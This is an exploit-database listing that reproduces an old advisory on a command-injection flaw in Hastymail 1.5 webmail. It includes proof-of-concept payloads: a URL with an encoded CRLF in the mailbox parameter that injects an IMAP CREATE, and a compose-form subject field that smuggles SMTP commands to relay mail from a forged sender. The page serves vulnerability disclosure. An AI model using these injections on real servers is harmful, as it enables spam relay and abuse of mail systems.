header-logo
Suggest Exploit
vendor:
Hastymail
by:
SecurityFocus
7.5
CVSS
HIGH
Command Injection
78
CWE
Product Name: Hastymail
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Hastymail IMAP/SMTP Command Injection Vulnerability

Hastymail is prone to an IMAP/SMTP command-injection vulnerability because it fails to sufficiently sanitize user-supplied input. An authenticated malicious user could execute arbitrary IMAP/SMTP commands on the affected mail server processes. This may allow the user to send SPAM from the server or to exploit latent vulnerabilities in the underlying system. An example of sending the CREATE IMAP commands to the vulnerable parameter and an SMTP POST relay example from a nonexistant email address is available.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/20424/info

Hastymail is prone to an IMAP / SMTP command-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An authenticated malicious user could execute arbitrary IMAP / SMTP commands on the affected mail server processes. This may allow the user to send SPAM from the server or to exploit latent vulnerabilities in the underlying system.

Hastymail 1.5 and prior versions are affected.

This example sends the CREATE IMAP commands to the vulnerable parameter:
http://www.example.com/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE
%2522INBOX.vad

The SMTP POST relay example from nonexistant email address is available:

POST http://www.example.com/<path_to_hastymail>/html/compose.php HTTP/1.1

to include:

Content-Disposition: form-data; name="subject"

Proof of Concept
.
mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.

Navigation

Suggest Exploit

Services By CQR